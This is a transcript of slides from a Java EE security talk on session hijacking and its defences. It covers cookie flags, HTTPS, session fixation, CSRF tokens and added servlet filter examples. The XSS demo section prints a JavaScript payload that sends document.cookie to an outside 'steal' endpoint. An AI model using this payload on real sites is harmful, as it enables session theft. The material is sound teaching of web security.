secure authentication and session management in java ee
TRANSCRIPT
Secure Authentication and Session Management in Java EE
Patrycja Wegrzynowicz
CTO, Yonita, Inc.
JavaDay Kiev 2015
(c) Patrycja Wegrzynowicz @yonlabs
About Me
• 15+ years of professional experience
• Software engineer, architect, head of software R&D
• Author and speaker
  • JavaOne, Devoxx, JavaZone, TheServerSide Java Symposium, Jazoon, OOPSLA, ASE, others
• Finalizing PhD in Computer Science
• Founder and CTO of Yonita
  • Bridge the gap between the industry and the academia
  • Automated detection and refactoring of software defects
  • Trainings and code reviews
  • Security, performance, concurrency, databases
• Twitter: @yonlabs
Agenda
• HTTP, session, OWASP
• 4 demos to hijack a session
• Best practices in Java EE
Security Stories 2014/2015
#!/bin/bash
HTTP
What is a Web Session?
• Session identifies interactions with one user
• Unique identifier associated with every request
  • Cookie
  • Header
  • Parameter
  • Hidden field
OWASP Top 10 Risks
Session Hijacking
• Session theft
  • URL, sniffing, logs, XSS
• Session fixation
• Session prediction
Demo: Session Exposed in URL
• I will log in to the sample application
• I will post a link with my session id on Twitter
  • @yonlabs
• Hijack my session :)
How to Avoid Session Id in URL?
• Default: allows cookies and URL rewriting
  • Default cookie, fallback on URL rewriting
  • To embrace all users
  • Disabled cookies in a browser
• Disable URL rewriting in an app server
  • App server specific
• Tracking mode
  • Java EE 6, web.xml
web.xml
<!-- Java EE 6, Servlet 3.0 -->
<session-config>
    <tracking-mode>COOKIE</tracking-mode>
</session-config>
Session Sniffing
• How to find out a cookie?
  • e.g., network monitoring and packet sniffing
• How to use a cookie?
  • Browsers' plugins and add-ons (e.g., Cookie Manager for Firefox)
  • Intercepting proxy (e.g., OWASP ZAP)
  • DIY: write your own code
Demo: Session Sniffing
• You will log in to the sample application
  • Any non-empty username
  • Please, use meaningful names, the victim will get a geecoin!
• I will monitor network traffic
  • tcpdump
• I will hijack one of your sessions
  • Cookie Manager
How to Avoid Session Exposure During Transport?
Encrypt! Use HTTPS.
web.xml
<security-constraint>
    <!-- a complete constraint also needs a <web-resource-collection> with a <url-pattern>, e.g. /* -->
    <user-data-constraint>
        <transport-guarantee>CONFIDENTIAL</transport-guarantee>
    </user-data-constraint>
</security-constraint>
web.xml
<!-- Java EE 6, Servlet 3.0 -->
<session-config>
    <cookie-config>
        <secure>true</secure>
    </cookie-config>
    <tracking-mode>COOKIE</tracking-mode>
</session-config>
Session Exposure
• Transport
  • Unencrypted transport
• Client-side
  • XSS
  • Attacks on browsers/OS
• Server-side
  • Logs
  • Session replication
  • Memory dump
How to Steal a Session if Secure Transport Is Used?
Attack a client!
Demo: Session Grabbed by XSS
• JavaScript code to steal a cookie
• Servlet to log down stolen cookies
• Vulnerable application to be exploited via injected JavaScript code (XSS)
Demo: Session Grabbed by XSS
• I will store malicious JavaScript code in the app
  • Through writing an "opinion"
• Log in to the vulnerable application
  • https://demo.yonita.com:8181/session-xss/
  • Any non-empty username
  • Please, use meaningful names, the victim will get a geecoin!
• Click the 'View others opinions' page
• Wait until I hijack your session :)
JavaScript to Steal a Cookie
<script>
  // hacker's service
  theft = 'http://demo.yonita.com/steal/steal?cookie=';
  // to bypass Same Origin Policy
  image = new Image();
  image.src = theft + document.cookie;
</script>
web.xml
<!-- Java EE 6, Servlet 3.0 -->
<session-config>
    <cookie-config>
        <http-only>true</http-only>
        <secure>true</secure>
    </cookie-config>
    <tracking-mode>COOKIE</tracking-mode>
</session-config>
Session Fixation: Scenario
• Hacker opens a web page of a system in a browser
  • New session initialized
• Hacker writes down the session id
• Hacker leaves the browser open
• User comes and logs into the app
  • Uses the session initialized by the hacker
• Hacker uses the written-down session id to hijack the user's session
Session Fixation: Solution
• Change the session ID after a successful login
  • more generally: after any escalation of privileges
• Java EE 7 (Servlet 3.1)
  • HttpServletRequest.changeSessionId()
• Java EE 6
  – HttpSession.invalidate()
  – HttpServletRequest.getSession(true)
Secure Session Management Best Practices
• Random, unpredictable session id
  • At least 16 characters
• Secure transport and storage of session id
  • Cookie preferred over URL rewriting
  • Cookie flags: secure, httpOnly
  • Consistent use of HTTPS (How to serve static content?)
  • Don't mix HTTP and HTTPS under the same domain/cookie path
  • Don't use too broad cookie paths
Secure Authentication Best Practices
• Session creation and destruction
  • New session id after login
  • Logout button
  • Session timeouts: 2-5 minutes for critical apps, 15-30 minutes for typical apps
• Session associated with the headers of the first request
  • IP, User-Agent, ...
  • If they don't match, something's going on (invalidate!)
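An added example (not code from the talk) of the last bullet: a servlet filter that binds each session to a hash of the first request's User-Agent and client address and invalidates the session when a later request on it does not match. The class name and the session attribute name are assumptions.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import javax.servlet.*;
import javax.servlet.annotation.WebFilter;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

// Hypothetical filter: remembers a fingerprint of the first request seen on a session
// and invalidates the session when a later request arrives with different headers.
@WebFilter("/*")
public class SessionBindingFilter implements Filter {
    static final String ATTR = "session.fingerprint";    // assumed attribute name

    @Override
    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest req = (HttpServletRequest) request;
        HttpServletResponse resp = (HttpServletResponse) response;
        HttpSession session = req.getSession(false);
        if (session != null) {
            byte[] now = fingerprint(req);
            byte[] bound = (byte[]) session.getAttribute(ATTR);
            if (bound == null) {
                session.setAttribute(ATTR, now);             // first request on this session
            } else if (!MessageDigest.isEqual(bound, now)) { // constant-time compare
                session.invalidate();                        // headers changed: treat as hijack
                resp.sendError(HttpServletResponse.SC_FORBIDDEN);
                return;
            }
        }
        chain.doFilter(request, response);
    }

    /** SHA-256 over User-Agent and client address. Binding to the address locks out users
     *  whose IP changes (mobile networks, rotating proxies); drop getRemoteAddr() if that bites. */
    static byte[] fingerprint(HttpServletRequest req) {
        String raw = req.getHeader("User-Agent") + "|" + req.getRemoteAddr();
        try {
            return MessageDigest.getInstance("SHA-256").digest(raw.getBytes(StandardCharsets.UTF_8));
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException(e);              // SHA-256 is mandatory in every JRE
        }
    }
    @Override public void init(FilterConfig config) {}
    @Override public void destroy() {}
}
```

Behind a reverse proxy, getRemoteAddr() returns the proxy's address, so the IP part of the fingerprint only helps if the container is configured to trust the proxy's forwarded-client header.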
Secure Authentication Best Practices cont.
• Java EE
  • Declarative authentication implemented using annotations or descriptors
    • Does not force a new session id after login (session fixation possible, app server specific)
  • Programmatic authentication
    • Java EE 7, Servlet 3.1
    • HttpServletRequest: authenticate, login, logout
    • Advanced flows and requirements
Secure Authentication Best Practices cont.
• My choice
  • Programmatic authentication with Java EE 7
    • HttpServletRequest: authenticate, login, logout
  • Declarative authorization
    • web.xml
    • @RolesAllowed, @PermitAll, @DenyAll
What If We Can't Steal a Cookie?
We can still use it!
Demo: CSRF to Use a Cookie
• I will log in to the application
• Log in to the application
  • https://demo.yonita.com:8181/session-csrf/
  • Any non-empty username
  • Please, use meaningful names, the first victim will get a geecoin!
• Click the link and the button 'Click me'
  • https://demo.yonita.com:8181/attack-csrf/
• I will check my account balance :)
CSRF: Solution
• Unique token associated with each form
  • Java EE (JSF): turned on by default
  • Any other modern framework
• Remember about REST/other services
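An added example, not the talk's code, of the per-session synchronizer token for applications that are not on JSF: the filter mints one random token per session and rejects any state-changing request that does not echo it back, either as a hidden form field or, for the REST/AJAX services the last bullet mentions, as a request header. The filter, attribute, field and header names are assumptions.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;
import javax.servlet.*;
import javax.servlet.annotation.WebFilter;
import javax.servlet.http.*;

// Hypothetical synchronizer-token filter for plain servlet/JSP pages.
@WebFilter("/*")
public class CsrfTokenFilter implements Filter {
    static final String TOKEN_ATTR = "csrf.token";     // assumed session attribute name
    static final String TOKEN_PARAM = "_csrf";         // assumed hidden form field name
    static final String TOKEN_HEADER = "X-CSRF-Token"; // assumed header name for REST/AJAX clients
    private static final SecureRandom RNG = new SecureRandom();

    @Override
    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest req = (HttpServletRequest) request;
        HttpServletResponse resp = (HttpServletResponse) response;
        String expected = tokenFor(req.getSession(true));
        String method = req.getMethod();
        // GET, HEAD and OPTIONS must stay side-effect free; every other method needs the token.
        if (!"GET".equals(method) && !"HEAD".equals(method) && !"OPTIONS".equals(method)) {
            String sent = req.getParameter(TOKEN_PARAM);
            if (sent == null) sent = req.getHeader(TOKEN_HEADER);
            if (sent == null || !MessageDigest.isEqual(sent.getBytes(StandardCharsets.UTF_8),
                                                       expected.getBytes(StandardCharsets.UTF_8))) {
                resp.sendError(HttpServletResponse.SC_FORBIDDEN);   // the cookie alone is not enough
                return;
            }
        }
        chain.doFilter(request, response);
    }

    /** Returns the session's token, minting 32 random bytes on first use. A forged cross-site
     *  request carries the session cookie automatically but cannot read this value. */
    static String tokenFor(HttpSession session) {
        String token = (String) session.getAttribute(TOKEN_ATTR);
        if (token == null) {
            byte[] bytes = new byte[32];
            RNG.nextBytes(bytes);
            token = Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
            session.setAttribute(TOKEN_ATTR, token);
        }
        return token;
    }
    @Override public void init(FilterConfig config) {}
    @Override public void destroy() {}
}
```

Pages render the session attribute into each form as a hidden field named _csrf, and scripted clients copy it into the X-CSRF-Token header; JSF applications already get an equivalent check by default, as the slide notes.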
Conclusion
You are never safe!
Continuous Integration
Continuous Refactoring
Continuous Learning!
Continuous Learning
A fool with a tool is still a fool!
Q&A
• Twitter: @yonlabs
• Upcoming trainings: How to attack and secure web apps in Java? Warszawa 15-16.12.2015